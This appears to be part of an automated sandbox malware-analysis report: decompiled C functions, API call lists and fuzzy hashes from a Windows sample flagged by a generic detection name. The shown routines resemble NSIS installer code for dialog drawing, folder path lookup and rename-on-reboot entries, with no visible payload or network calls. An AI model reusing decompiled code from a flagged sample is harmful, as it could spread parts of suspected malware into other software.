                                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                                            								_push(1);
                                                                            								E00404907(_a4, _v8);
                                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                                            								_t114 = _a16;
                                                                            							}
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                            							goto L28;
                                                                            						} else {
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                            								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                            							}
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                            								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                            							}
                                                                            							return 1;
                                                                            						}
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                            						goto L27;
                                                                            					} else {
                                                                            						_t69 =  *0x42c240; // 0x72cc24
                                                                            						_t29 = _t69 + 0x14; // 0x72cc38
                                                                            						_t116 = _t29;
                                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                                            							goto L27;
                                                                            						}
                                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                            						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                            						E004048E3();
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				_t117 = _a16;
                                                                            				_t75 =  *(_t117 + 0x30);
                                                                            				if(_t75 < 0) {
                                                                            					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                                            				}
                                                                            				_t76 =  *0x434f38 + _t75 * 2;
                                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                                            				_a8 = _t110;
                                                                            				_t78 =  &(_t76[1]);
                                                                            				_a16 = _t78;
                                                                            				_v16 = _t78;
                                                                            				_v12 = 0;
                                                                            				_v8 = E00404609;
                                                                            				if(_t110 != 2) {
                                                                            					_v8 = E004045CF;
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                            				_push(0x22);
                                                                            				E00404499(_a4);
                                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                            				_push(0x23);
                                                                            				E00404499(_a4);
                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                            				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                            				E004044CE(_t118);
                                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                                            				_t92 =  *( *0x434f10 + 0x68);
                                                                            				if(_t92 < 0) {
                                                                            					_t92 = GetSysColor( ~_t92);
                                                                            				}
                                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                            				 *0x42b234 = 0;
                                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                            				 *0x42b234 = 0;
                                                                            				return 0;
                                                                            			}




















                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                            • GetSysColor.USER32(?), ref: 00404738
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                            • lstrlenW.KERNEL32(?), ref: 00404759
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                            • SendMessageW.USER32(00000000), ref: 004047DB
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                            • SetCursor.USER32(00000000), ref: 0040485A
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                            • SetCursor.USER32(00000000), ref: 00404876
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: Call$N
                                                                            • API String ID: 3103080414-3438112850
                                                                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				struct tagRECT _v32;
                                                                            				struct tagPAINTSTRUCT _v96;
                                                                            				struct HDC__* _t70;
                                                                            				struct HBRUSH__* _t87;
                                                                            				struct HFONT__* _t94;
                                                                            				long _t102;
                                                                            				signed int _t126;
                                                                            				struct HDC__* _t128;
                                                                            				intOrPtr _t130;
                                                                            
                                                                            				if(_a8 == 0xf) {
                                                                            					_t130 =  *0x434f10;
                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                            					_a8 = _t70;
                                                                            					GetClientRect(_a4,  &_v32);
                                                                            					_t126 = _v32.bottom;
                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                            					while(_v32.top < _t126) {
                                                                            						_a12 = _t126 - _v32.top;
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                            						_a16 = _t87;
                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                            						DeleteObject(_a16);
                                                                            						_v32.top = _v32.top + 4;
                                                                            					}
                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                            						_a16 = _t94;
                                                                            						if(_t94 != 0) {
                                                                            							_t128 = _a8;
                                                                            							_v32.left = 0x10;
                                                                            							_v32.top = 8;
                                                                            							SetBkMode(_t128, 1);
                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                            							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                            							SelectObject(_t128, _a8);
                                                                            							DeleteObject(_a16);
                                                                            						}
                                                                            					}
                                                                            					EndPaint(_a4,  &_v96);
                                                                            					return 0;
                                                                            				}
                                                                            				_t102 = _a16;
                                                                            				if(_a8 == 0x46) {
                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                            				}
                                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                            			}














                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406183(void* __ecx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				long _t12;
                                                                            				long _t24;
                                                                            				char* _t31;
                                                                            				int _t37;
                                                                            				void* _t38;
                                                                            				intOrPtr* _t39;
                                                                            				long _t42;
                                                                            				WCHAR* _t44;
                                                                            				void* _t46;
                                                                            				void* _t48;
                                                                            				void* _t49;
                                                                            				void* _t52;
                                                                            				void* _t53;
                                                                            
                                                                            				_t38 = __ecx;
                                                                            				_t44 =  *(_t52 + 0x14);
                                                                            				 *0x430908 = 0x55004e;
                                                                            				 *0x43090c = 0x4c;
                                                                            				if(_t44 == 0) {
                                                                            					L3:
                                                                            					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                            						_t53 = _t52 + 0x10;
                                                                            						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                            						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                            						_t48 = _t12;
                                                                            						 *(_t53 + 0x18) = _t48;
                                                                            						if(_t48 != 0xffffffff) {
                                                                            							_t42 = GetFileSize(_t48, 0);
                                                                            							_t6 = _t37 + 0xa; // 0xa
                                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                            							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                            								L18:
                                                                            								return CloseHandle(_t48);
                                                                            							} else {
                                                                            								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                            									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                            									if(_t49 == 0) {
                                                                            										_t48 =  *(_t53 + 0x18);
                                                                            										L16:
                                                                            										_t24 = _t42;
                                                                            										L17:
                                                                            										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                                            										E004060DF(_t48, _t46, _t42 + _t37);
                                                                            										GlobalFree(_t46);
                                                                            										goto L18;
                                                                            									}
                                                                            									_t39 = _t46 + _t42;
                                                                            									_t31 = _t39 + _t37;
                                                                            									while(_t39 > _t49) {
                                                                            										 *_t31 =  *_t39;
                                                                            										_t31 = _t31 - 1;
                                                                            										_t39 = _t39 - 1;
                                                                            									}
                                                                            									_t24 = _t49 - _t46 + 1;
                                                                            									_t48 =  *(_t53 + 0x18);
                                                                            									goto L17;
                                                                            								}
                                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                            								_t42 = _t42 + 0xa;
                                                                            								goto L16;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					CloseHandle(E0040602D(_t44, 0, 1));
                                                                            					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				return _t12;
                                                                            			}

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                            • wsprintfA.USER32 ref: 00406202
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                            • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                            				struct _ITEMIDLIST* _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _t44;
                                                                            				WCHAR* _t45;
                                                                            				signed char _t47;
                                                                            				signed int _t48;
                                                                            				short _t59;
                                                                            				short _t61;
                                                                            				short _t63;
                                                                            				void* _t71;
                                                                            				signed int _t77;
                                                                            				signed int _t78;
                                                                            				short _t81;
                                                                            				short _t82;
                                                                            				signed char _t84;
                                                                            				signed int _t85;
                                                                            				void* _t98;
                                                                            				void* _t104;
                                                                            				intOrPtr* _t105;
                                                                            				void* _t107;
                                                                            				WCHAR* _t108;
                                                                            				void* _t110;
                                                                            
                                                                            				_t107 = __esi;
                                                                            				_t104 = __edi;
                                                                            				_t71 = __ebx;
                                                                            				_t44 = _a8;
                                                                            				if(_t44 < 0) {
                                                                            					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                                            				}
                                                                            				_push(_t71);
                                                                            				_push(_t107);
                                                                            				_push(_t104);
                                                                            				_t105 =  *0x434f38 + _t44 * 2;
                                                                            				_t45 = 0x432ea0;
                                                                            				_t108 = 0x432ea0;
                                                                            				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                            					_t108 = _a4;
                                                                            					_a4 = _a4 & 0x00000000;
                                                                            				}
                                                                            				_t81 =  *_t105;
                                                                            				_a8 = _t81;
                                                                            				if(_t81 == 0) {
                                                                            					L43:
                                                                            					 *_t108 =  *_t108 & 0x00000000;
                                                                            					if(_a4 == 0) {
                                                                            						return _t45;
                                                                            					}
                                                                            					return E0040653D(_a4, _t45);
                                                                            				} else {
                                                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                            						_t98 = 2;
                                                                            						_t105 = _t105 + _t98;
                                                                            						if(_t81 >= 4) {
                                                                            							if(__eflags != 0) {
                                                                            								 *_t108 = _t81;
                                                                            								_t108 = _t108 + _t98;
                                                                            								__eflags = _t108;
                                                                            							} else {
                                                                            								 *_t108 =  *_t105;
                                                                            								_t108 = _t108 + _t98;
                                                                            								_t105 = _t105 + _t98;
                                                                            							}
                                                                            							L42:
                                                                            							_t82 =  *_t105;
                                                                            							_a8 = _t82;
                                                                            							if(_t82 != 0) {
                                                                            								_t81 = _a8;
                                                                            								continue;
                                                                            							}
                                                                            							goto L43;
                                                                            						}
                                                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                            						_t47 =  *_t105;
                                                                            						_t48 = _t47 & 0x000000ff;
                                                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                            						_t85 = _t84 & 0x000000ff;
                                                                            						_v28 = _t48 | 0x00008000;
                                                                            						_t77 = 2;
                                                                            						_v16 = _t85;
                                                                            						_t105 = _t105 + _t77;
                                                                            						_v24 = _t48;
                                                                            						_v20 = _t85 | 0x00008000;
                                                                            						if(_a8 != _t77) {
                                                                            							__eflags = _a8 - 3;
                                                                            							if(_a8 != 3) {
                                                                            								__eflags = _a8 - 1;
                                                                            								if(__eflags == 0) {
                                                                            									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                            									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                            								}
                                                                            								L38:
                                                                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                            								_t45 = 0x432ea0;
                                                                            								goto L42;
                                                                            							}
                                                                            							_t78 = _v12;
                                                                            							__eflags = _t78 - 0x1d;
                                                                            							if(_t78 != 0x1d) {
                                                                            								__eflags = (_t78 << 0xb) + 0x436000;
                                                                            								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                            							} else {
                                                                            								E00406484(_t108,  *0x434f08);
                                                                            							}
                                                                            							__eflags = _t78 + 0xffffffeb - 7;
                                                                            							if(__eflags < 0) {
                                                                            								L29:
                                                                            								E004067C4(_t108);
                                                                            							}
                                                                            							goto L38;
                                                                            						}
                                                                            						if( *0x434f84 != 0) {
                                                                            							_t77 = 4;
                                                                            						}
                                                                            						_t121 = _t48;
                                                                            						if(_t48 >= 0) {
                                                                            							__eflags = _t48 - 0x25;
                                                                            							if(_t48 != 0x25) {
                                                                            								__eflags = _t48 - 0x24;
                                                                            								if(_t48 == 0x24) {
                                                                            									GetWindowsDirectoryW(_t108, 0x400);
                                                                            									_t77 = 0;
                                                                            								}
                                                                            								while(1) {
                                                                            									__eflags = _t77;
                                                                            									if(_t77 == 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									_t59 =  *0x434f04;
                                                                            									_t77 = _t77 - 1;
                                                                            									__eflags = _t59;
                                                                            									if(_t59 == 0) {
                                                                            										L22:
                                                                            										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                            										__eflags = _t61;
                                                                            										if(_t61 != 0) {
                                                                            											L24:
                                                                            											 *_t108 =  *_t108 & 0x00000000;
                                                                            											__eflags =  *_t108;
                                                                            											continue;
                                                                            										}
                                                                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                            										_a8 = _t61;
                                                                            										__imp__CoTaskMemFree(_v8);
                                                                            										__eflags = _a8;
                                                                            										if(_a8 != 0) {
                                                                            											goto L26;
                                                                            										}
                                                                            										goto L24;
                                                                            									}
                                                                            									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                            									__eflags = _t63;
                                                                            									if(_t63 == 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									goto L22;
                                                                            								}
                                                                            								goto L26;
                                                                            							}
                                                                            							GetSystemDirectoryW(_t108, 0x400);
                                                                            							goto L26;
                                                                            						} else {
                                                                            							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                            							if( *_t108 != 0) {
                                                                            								L27:
                                                                            								if(_v16 == 0x1a) {
                                                                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                            								}
                                                                            								goto L29;
                                                                            							}
                                                                            							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                            							L26:
                                                                            							if( *_t108 == 0) {
                                                                            								goto L29;
                                                                            							}
                                                                            							goto L27;
                                                                            						}
                                                                            					}
                                                                            					goto L43;
                                                                            				}
                                                                            			}


                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00000000,00425A20,76FA23A0), ref: 004066A8
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 4260037668-854254380
                                                                            • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                            • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				long _t39;
                                                                            				long _t41;
                                                                            				void* _t44;
                                                                            				signed char _t50;
                                                                            				long* _t54;
                                                                            
                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                            					L18:
                                                                            					return 0;
                                                                            				}
                                                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                            					goto L18;
                                                                            				} else {
                                                                            					_t50 = _t54[5];
                                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                                            						goto L18;
                                                                            					}
                                                                            					_t39 =  *_t54;
                                                                            					if((_t50 & 0x00000002) != 0) {
                                                                            						_t39 = GetSysColor(_t39);
                                                                            					}
                                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                                            						SetTextColor(_a8, _t39);
                                                                            					}
                                                                            					SetBkMode(_a8, _t54[4]);
                                                                            					_t41 = _t54[1];
                                                                            					_v16.lbColor = _t41;
                                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                                            						_t41 = GetSysColor(_t41);
                                                                            						_v16.lbColor = _t41;
                                                                            					}
                                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                                            						SetBkColor(_a8, _t41);
                                                                            					}
                                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                                            						_v16.lbStyle = _t54[2];
                                                                            						_t44 = _t54[3];
                                                                            						if(_t44 != 0) {
                                                                            							DeleteObject(_t44);
                                                                            						}
                                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                                            					}
                                                                            					return _t54[3];
                                                                            				}
                                                                            			}










                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                            • GetSysColor.USER32(00000000), ref: 0040455B
